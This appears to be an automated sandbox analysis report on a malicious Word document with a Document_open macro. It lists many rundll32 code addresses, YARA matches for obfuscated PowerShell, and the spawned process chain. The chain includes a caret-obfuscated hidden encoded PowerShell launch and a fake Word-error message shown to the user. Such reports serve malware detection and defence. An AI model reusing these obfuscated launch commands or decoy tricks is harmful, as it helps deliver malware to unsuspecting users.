                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E389510_2_001E3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D568E10_2_001D568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E42DA10_2_001E42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC0C610_2_001DC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E02C310_2_001E02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D873610_2_001D8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E4B4110_2_001E4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7B6310_2_001D7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E63C110_2_001E63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7A0F10_2_001E7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E340A10_2_001E340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4A3510_2_001D4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9A3710_2_001D9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2A3010_2_001D2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE05A10_2_001DE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DEA4C10_2_001DEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF44410_2_001DF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E687F10_2_001E687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5A6110_2_001E5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E889D10_2_001E889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D128010_2_001D1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D48BD10_2_001D48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D60B910_2_001D60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D80BA10_2_001D80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EA0AF10_2_001EA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D62A310_2_001D62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8ADC10_2_001E8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D96CD10_2_001D96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E20C510_2_001E20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1CFA10_2_001D1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E26F510_2_001E26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D88E510_2_001D88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E12E210_2_001E12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7F1F10_2_001E7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8D1C10_2_001E8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5D1D10_2_001E5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E511B10_2_001E511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E2B1610_2_001E2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB11210_2_001DB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0F0C10_2_001E0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7D0310_2_001E7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D153C10_2_001D153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBB3A10_2_001DBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF53610_2_001DF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0D3310_2_001E0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB75F10_2_001DB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D675410_2_001D6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E234910_2_001E2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8F4910_2_001E8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9B4510_2_001E9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5B7910_2_001D5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8F7810_2_001D8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE37710_2_001DE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E177310_2_001E1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC76910_2_001DC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0B6810_2_001E0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D839D10_2_001D839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6D9F10_2_001D6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D799810_2_001D7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E878F10_2_001E878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF98C10_2_001DF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E958610_2_001E9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E61B810_2_001E61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E6DB910_2_001E6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D17AC10_2_001D17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E73AC10_2_001E73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D69A010_2_001D69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E1BDF10_2_001E1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9FDC10_2_001D9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E71EF10_2_001E71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD7EB10_2_001DD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E67E910_2_001E67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E3FE710_2_001E3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E31E210_2_001E31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B2C6311_2_004B2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BEE7811_2_004BEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB41F11_2_004BB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC0C611_2_004BC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C02C311_2_004C02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C42DA11_2_004C42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B568E11_2_004B568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C389511_2_004C3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C4B4111_2_004C4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B7B6311_2_004B7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B873611_2_004B8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C63C111_2_004C63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BEA4C11_2_004BEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF44411_2_004BF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BE05A11_2_004BE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C5A6111_2_004C5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C687F11_2_004C687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7A0F11_2_004C7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C340A11_2_004C340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B2A3011_2_004B2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B9A3711_2_004B9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B4A3511_2_004B4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B96CD11_2_004B96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C20C511_2_004C20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8ADC11_2_004C8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B88E511_2_004B88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C12E211_2_004C12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B1CFA11_2_004B1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C26F511_2_004C26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B128011_2_004B1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C889D11_2_004C889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004CA0AF11_2_004CA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B62A311_2_004B62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B80BA11_2_004B80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B60B911_2_004B60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B48BD11_2_004B48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8F4911_2_004C8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C234911_2_004C2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C9B4511_2_004C9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB75F11_2_004BB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B675411_2_004B6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC76911_2_004BC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0B6811_2_004C0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B5B7911_2_004B5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B8F7811_2_004B8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BE37711_2_004BE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C177311_2_004C1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0F0C11_2_004C0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7D0311_2_004C7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8D1C11_2_004C8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C5D1D11_2_004C5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7F1F11_2_004C7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C511B11_2_004C511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB11211_2_004BB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C2B1611_2_004C2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BBB3A11_2_004BBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B153C11_2_004B153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF53611_2_004BF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0D3311_2_004C0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C1BDF11_2_004C1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B9FDC11_2_004B9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BD7EB11_2_004BD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C71EF11_2_004C71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C67E911_2_004C67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C3FE711_2_004C3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C31E211_2_004C31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C878F11_2_004C878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF98C11_2_004BF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C958611_2_004C9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B799811_2_004B7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B6D9F11_2_004B6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B839D11_2_004B839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C73AC11_2_004C73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B17AC11_2_004B17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B69A011_2_004B69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C61B811_2_004C61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C6DB911_2_004C6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DEE7812_2_007DEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D2C6312_2_007D2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB41F12_2_007DB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E42DA12_2_007E42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC0C612_2_007DC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E02C312_2_007E02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E389512_2_007E3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D568E12_2_007D568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D7B6312_2_007D7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E4B4112_2_007E4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D873612_2_007D8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E63C112_2_007E63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E687F12_2_007E687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E5A6112_2_007E5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DE05A12_2_007DE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DEA4C12_2_007DEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF44412_2_007DF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D4A3512_2_007D4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D9A3712_2_007D9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D2A3012_2_007D2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7A0F12_2_007E7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E340A12_2_007E340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D1CFA12_2_007D1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E26F512_2_007E26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D88E512_2_007D88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E12E212_2_007E12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8ADC12_2_007E8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D96CD12_2_007D96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E20C512_2_007E20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D48BD12_2_007D48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D60B912_2_007D60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D80BA12_2_007D80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007EA0AF12_2_007EA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D62A312_2_007D62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E889D12_2_007E889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D128012_2_007D1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D5B7912_2_007D5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D8F7812_2_007D8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DE37712_2_007DE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E177312_2_007E1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC76912_2_007DC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0B6812_2_007E0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB75F12_2_007DB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D675412_2_007D6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E234912_2_007E2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8F4912_2_007E8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E9B4512_2_007E9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D153C12_2_007D153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DBB3A12_2_007DBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF53612_2_007DF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0D3312_2_007E0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7F1F12_2_007E7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8D1C12_2_007E8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E5D1D12_2_007E5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E511B12_2_007E511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E2B1612_2_007E2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB11212_2_007DB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0F0C12_2_007E0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7D0312_2_007E7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E71EF12_2_007E71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DD7EB12_2_007DD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E67E912_2_007E67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E3FE712_2_007E3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E31E212_2_007E31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E1BDF12_2_007E1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D9FDC12_2_007D9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E61B812_2_007E61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E6DB912_2_007E6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D17AC12_2_007D17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E73AC12_2_007E73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D69A012_2_007D69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D839D12_2_007D839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D6D9F12_2_007D6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D799812_2_007D7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E878F12_2_007E878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF98C12_2_007DF98C
                    Source: DATA-480841.docOLE, VBA macro line: Private Sub Document_open()
                    Source: VBA code instrumentationOLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_openName: Document_open
                    Source: DATA-480841.docOLE indicator, VBA macros: true
                    Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@26/8@7/5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00211C88 CreateToolhelp32Snapshot,15_2_00211C88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,7_2_10002D70
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$TA-480841.docJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA28.tmpJump to behavior
                    Source: DATA-480841.docOLE indicator, Word Document stream: true
                    Source: DATA-480841.docOLE document summary: title field not present or empty
                    Source: DATA-480841.docOLE document summary: edited time not present or 0
                    Source: C:\Windows\System32\msg.exe Console Write: Async message sent to session Console
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: DATA-480841.docVirustotal: Detection: 59%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                    Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLLJump to behavior
